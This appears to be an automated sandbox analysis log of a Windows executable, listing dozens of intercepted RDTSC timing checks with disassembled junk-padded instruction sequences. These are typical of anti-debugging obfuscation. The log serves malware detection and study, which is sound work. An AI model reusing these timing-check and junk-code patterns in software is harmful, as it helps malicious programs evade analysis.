Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EB450 second address: 7EB47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007F8A9C76F227h 0x0000000d jbe 00007F8A9C76F216h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EB47A second address: 7EB484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F8A9D254EA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EB484 second address: 7EB488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EBC62 second address: 7EBCB1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8A9D254EB2h 0x00000008 jmp 00007F8A9D254EB9h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8A9D254EB7h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EBCB1 second address: 7EBCBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8A9C76F216h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0046 second address: 7F005B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8A9D254EA6h 0x0000000a popad 0x0000000b jnl 00007F8A9D254EAEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0325 second address: 7F0329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0329 second address: 7F032D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F032D second address: 7F034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8A9C76F223h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F034A second address: 7F034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F060D second address: 7F065F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F228h 0x00000007 jmp 00007F8A9C76F224h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F8A9C76F229h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F0AC9 second address: 7F0ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F567C second address: 7F5699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F8A9C76F223h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FEE44 second address: 7FEE49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FEE49 second address: 7FEE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FEE4F second address: 7FEE55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD0DE second address: 7FD0E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD4EB second address: 7FD4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD4F5 second address: 7FD502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007F8A9C76F21Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD502 second address: 7FD50F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD50F second address: 7FD518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD518 second address: 7FD51C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FDDA0 second address: 7FDDAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8A9C76F216h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FDF2B second address: 7FDF4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F8A9D254EA6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FDF4A second address: 7FDF4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FEC9B second address: 7FECBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F8A9D254EAFh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8042EF second address: 804309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 804309 second address: 804313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 804313 second address: 804319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 804319 second address: 80431D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 804443 second address: 804449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 804449 second address: 80444D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80444D second address: 804451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8103AD second address: 8103B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 810105 second address: 81010E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81010E second address: 810121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F8A9D254EA6h 0x0000000c jnl 00007F8A9D254EA6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 810121 second address: 81013C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F8A9C76F216h 0x00000009 jmp 00007F8A9C76F21Ch 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81013C second address: 810144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 811940 second address: 81195B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8A9C76F216h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jp 00007F8A9C76F21Eh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 jns 00007F8A9C76F216h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81195B second address: 811960 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81C36D second address: 81C38D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007F8A9C76F216h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8A9C76F21Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C0AA second address: 82C0FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jp 00007F8A9D254EA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8A9D254EB9h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8A9D254EB7h 0x00000019 jmp 00007F8A9D254EB1h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C0FA second address: 82C110 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8A9C76F21Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a jnp 00007F8A9C76F216h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C110 second address: 82C114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C114 second address: 82C11A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C447 second address: 82C459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A9D254EACh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C459 second address: 82C48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A9C76F229h 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F8A9C76F21Eh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C791 second address: 82C797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82C943 second address: 82C949 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82D536 second address: 82D53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82D53A second address: 82D553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9C76F21Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F8A9C76F216h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82D553 second address: 82D557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 82D557 second address: 82D55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83204C second address: 832063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9D254EB3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 832063 second address: 832067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 831D7F second address: 831D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 831D87 second address: 831D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 831D8D second address: 831D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 831D98 second address: 831D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 831D9C second address: 831DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83C5DD second address: 83C5FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007F8A9C76F22Bh 0x0000000b jmp 00007F8A9C76F225h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83C5FD second address: 83C603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83C603 second address: 83C607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83C46E second address: 83C48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A9D254EB9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83C48D second address: 83C492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8469A1 second address: 8469D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A9D254EB8h 0x00000007 jmp 00007F8A9D254EADh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnl 00007F8A9D254EB0h 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 849D9E second address: 849DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 849DA4 second address: 849DA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 849BF1 second address: 849BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 849BF7 second address: 849C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 jne 00007F8A9D254EA6h 0x0000000e jns 00007F8A9D254EA6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 849C0D second address: 849C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F8A9C76F223h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 849C2A second address: 849C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8A9D254EA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 856076 second address: 856082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F8A9C76F216h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 856082 second address: 856086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 856086 second address: 856094 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F8A9C76F216h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 856094 second address: 8560A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jl 00007F8A9D254EACh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8560A5 second address: 8560AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86EF96 second address: 86EF9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86EF9B second address: 86EFA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86EFA0 second address: 86EFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A9D254EB2h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8A9D254EB1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86EFCE second address: 86EFE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9C76F223h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86EFE7 second address: 86EFEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86EFEB second address: 86EFEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86F2D4 second address: 86F2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F8A9D254EA6h 0x0000000b jo 00007F8A9D254EA6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86F2E6 second address: 86F2F6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8A9C76F222h 0x00000008 jbe 00007F8A9C76F216h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86F441 second address: 86F457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8A9D254EB1h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86F8E2 second address: 86F8E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 86FA7C second address: 86FAA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F8A9D254EA6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F8A9D254EB5h 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8741A2 second address: 8741A8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8741A8 second address: 8741BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A9D254EB1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8742A9 second address: 8742FF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8A9C76F216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F8A9C76F21Ch 0x00000010 jno 00007F8A9C76F216h 0x00000016 popad 0x00000017 push eax 0x00000018 push ebx 0x00000019 push edi 0x0000001a pushad 0x0000001b popad 0x0000001c pop edi 0x0000001d pop ebx 0x0000001e nop 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F8A9C76F218h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000014h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 push 00000004h 0x0000003b sub dword ptr [ebp+12452C04h], edi 0x00000041 call 00007F8A9C76F219h 0x00000046 push esi 0x00000047 pushad 0x00000048 jg 00007F8A9C76F216h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8742FF second address: 874323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 ja 00007F8A9D254EA6h 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jns 00007F8A9D254EA6h 0x00000019 popad 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 874323 second address: 874327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 874327 second address: 87434E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8A9D254EB7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8745B5 second address: 8745D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 mov edx, dword ptr [ebp+122D367Ah] 0x0000000d push dword ptr [ebp+122D182Eh] 0x00000013 add dword ptr [ebp+122D1BB8h], edi 0x00000019 push 089630BDh 0x0000001e push esi 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 875FEC second address: 875FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 jl 00007F8A9D254EBCh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
